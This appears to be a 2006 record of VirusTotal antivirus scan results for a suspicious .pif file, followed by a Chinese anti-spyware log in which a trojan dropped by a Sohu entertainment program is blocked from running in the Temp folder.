ClamAV devel-20060426 12.06.2006 no virus found
DrWeb 4.33 12.06.2006 BACKDOOR.Trojan packed by BINARYRES
eSafe 7.0.14.0 12.06.2006 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.78 12.06.2006 no virus found
eTrust-Vet 30.3.3234 12.06.2006 no virus found
Ewido 4.0 12.05.2006 no virus found
Fortinet 2.82.0.0 12.06.2006 suspicious
F-Prot 3.16f 12.05.2006 no virus found
F-Prot4 4.2.1.29 12.05.2006 no virus found
Ikarus T3.1.0.26 12.05.2006 Backdoor.Win32.PcClient.GV
Kaspersky 4.0.2.24 12.06.2006 no virus found
McAfee 4911 12.05.2006 no virus found
Microsoft 1.1804 12.06.2006 no virus found
NOD32v2 1904 12.06.2006 probably unknown NewHeur_PE virus
Norman 5.80.02 12.05.2006 no virus found
Panda 9.0.0.4 12.06.2006 Suspicious file
Prevx1 V2 12.06.2006 no virus found
Sophos 4.12.0 12.06.2006 Mal/Packer
Sunbelt 2.2.907.0 11.30.2006 no virus found
TheHacker 6.0.3.130 12.06.2006 no virus found
UNA 1.83 12.05.2006 no virus found
VBA32 3.11.1 12.05.2006 no virus found
VirusBuster 4.3.15:9 12.05.2006 no virus found
STATUS: FINISHEDComplete scanning result of "L_hy50..pif", received in VirusTotal at 12.06.2006, 15:59:13 (CET).
Antivirus Version Update Result
AntiVir 7.2.0.49 12.06.2006 HEUR/Crypted.E
Authentium 4.93.8 12.05.2006 no virus found
Avast 4.7.892.0 12.06.2006 no virus found
AVG 386 12.06.2006 no virus found
BitDefender 7.2 12.06.2006 no virus found
CAT-QuickHeal 8.00 12.05.2006 (Suspicious) – DNAScan
ClamAV devel-20060426 12.06.2006 no virus found
DrWeb 4.33 12.06.2006 BackDoor.Pomax
eSafe 7.0.14.0 12.06.2006 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.78 12.06.2006 no virus found
eTrust-Vet 30.3.3234 12.06.2006 no virus found
Ewido 4.0 12.05.2006 no virus found
Fortinet 2.82.0.0 12.06.2006 suspicious
F-Prot 3.16f 12.05.2006 no virus found
F-Prot4 4.2.1.29 12.05.2006 no virus found
Ikarus T3.1.0.26 12.05.2006 Trojan-Downloader.Win32.Small.czl
Kaspersky 4.0.2.24 12.06.2006 no virus found
McAfee 4911 12.05.2006 New Malware.w
Microsoft 1.1804 12.06.2006 no virus found
NOD32v2 1904 12.06.2006 no virus found
Norman 5.80.02 12.05.2006 no virus found
Panda 9.0.0.4 12.06.2006 Suspicious file
Prevx1 V2 12.06.2006 Trojan.Downloader
Sophos 4.12.0 12.06.2006 Mal/Packer
Sunbelt 2.2.907.0 11.30.2006 no virus found
TheHacker 6.0.3.130 12.06.2006 no virus found
UNA 1.83 12.05.2006 no virus found
VBA32 3.11.1 12.05.2006 no virus found
VirusBuster 4.3.15:9 12.05.2006 no virus found
2006-12-6 21:49:03 1095 SF\\shengfang G:\\TEMP\\soh4.exe G:\\TEMP\\nsj7.tmp\\nsSCM.dll 防间谍程序最大保护:禁止所有程序从 Temp 文件夹运行文件
#1 搜狐娱乐播报的一个程序被阻挡了
程序:
C:\\DOCUMENTS AND SETTINGS\\ADMINISTRATOR\\LOCAL SETTINGS\\TEMP\\SOH4B.EXE
木马程序生成以下文件:
1) C:\\DOCUMENTS AND SETTINGS\\ADMINISTRATOR\\LOCAL SETTINGS\\TEMP\\NSY4E.TMP\\NSSCM.DLL
2) C:\\DOCUMENTS AND SETTINGS\\ADMINISTRATOR\\LOCAL SETTINGS\\TEMP\\NSY4E.TMP\\KILLPROCDL
木马名称:未知后门程序
程序:
C:\\DOCUMENTS AND SETTINGS\\ADMINISTRATOR\\LOCAL SETTINGS\\TEMP\\NSM53.TMP\\NSSCM.DLL
是木马程序!
已成功阻止其运行,是否要删除此文件?
木马名称:未知后门程序